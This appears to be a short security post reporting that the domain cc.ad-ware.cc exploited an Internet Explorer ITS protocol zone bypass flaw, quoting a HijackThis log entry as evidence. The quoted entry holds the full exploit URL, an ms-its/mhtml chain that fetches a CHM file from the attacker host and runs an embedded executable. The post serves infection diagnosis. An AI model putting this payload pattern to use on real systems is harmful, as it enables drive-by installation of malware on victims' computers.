cc.ad-ware.cc seems to have been exploiting the Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability, based on the following Hijackthis log entry:

O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\foo.mht!http://cc.ad-ware.cc/ZMth5iXIe5WM56oCW13o.chm::/o n.exe
